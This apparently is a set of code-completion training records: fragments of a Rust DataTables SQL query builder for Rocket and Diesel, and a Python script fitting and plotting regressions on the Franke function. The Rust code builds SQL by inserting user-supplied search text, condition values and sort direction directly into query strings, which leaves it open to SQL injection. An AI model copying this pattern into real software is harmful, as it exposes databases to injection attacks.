## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
} | identifier_body |
lib.rs |
/*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct | <'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
}
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned()
}
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
}
| Tables | identifier_name |
plot_3d.py |
from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
n2=n**2
np.random.seed(seed)
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y)
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def | (in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s
| get_pow_str | identifier_name |
plot_3d.py | from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
n2=n**2
np.random.seed(seed) |
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
